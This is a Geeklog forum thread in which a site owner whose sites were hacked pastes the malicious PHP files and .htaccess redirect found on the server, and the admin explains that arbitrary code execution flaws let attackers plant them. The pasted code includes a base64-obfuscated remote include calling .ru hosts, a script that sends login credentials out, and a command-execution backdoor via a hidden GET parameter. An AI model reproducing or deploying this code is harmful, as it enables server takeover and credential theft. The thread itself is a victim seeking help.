Welcome to Geeklog, Anonymous Monday, October 14 2024 @ 07:34 pm EDT

Geeklog Forums

hacking a family site


hacked

Anonymous
I've recently found these files strewn throughout my system dirs by various names and .htaccess files providing redirects to them from a 404 (or something like that):
first file:
Text Formatted Code
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

 

second file:
Text Formatted Code
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

 

and the .htaccess file:
Text Formatted Code
Options -MultiViews
ErrorDocument 404 /mysite/geeklogdir/plugins/someplugin/includes.php

 


what's up with that? how could these files have got there and what do they do? I'm deleting them as I find them. They are in a whold bunch of directories. ...and I don't have a clue how to read server logs.
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Which Geeklog version are you on?

Unfortunately, we had a few issues recently that allowed attackers to execute arbitraty code - which means that they could do just about anything, including creating or uploading new files.

bye, Dirk
 Quote

hacked

Anonymous
I found the files while upgrading to 1.4sr5, but the modification date of the files shows that they were created when I was still running 1.3.11sr1.

upgrade went fine by the way. Smile

the geeklog dir was inside the doc root, but it was (per the install instructions) renamed and password protected. The files I mentioned above were found in this password protected dir as well as many publicly accessible directories.

I found these files accross 3 domains, 2 subdomains, all on the same server obvoiusly, involving not only geeklog installations but 2 word press installations as well. I found them mostly in any directories named: data; backups; logs; userphotos; articles; default; and a few others that I can't remember.

HOLY CRAP! I just found that the username and password in the config.php file (of the installation with the gl dir outside the web root) was changed. the new username was also added to the database with all priveledges. wtf?!
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Sounds really bad Shocked

The password protection will only help against access from the outside (e.g. via the browser), but won't help when you can run your own PHP scripts (or Geeklog itself wouldn't be able to access the files in the password-protected directories). So, as I wrote above, once you can execute your own PHP code on someone else's server, pretty much everything is possible ...

bye, Dirk
 Quote

All times are EDT. The time is now 07:34 pm.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content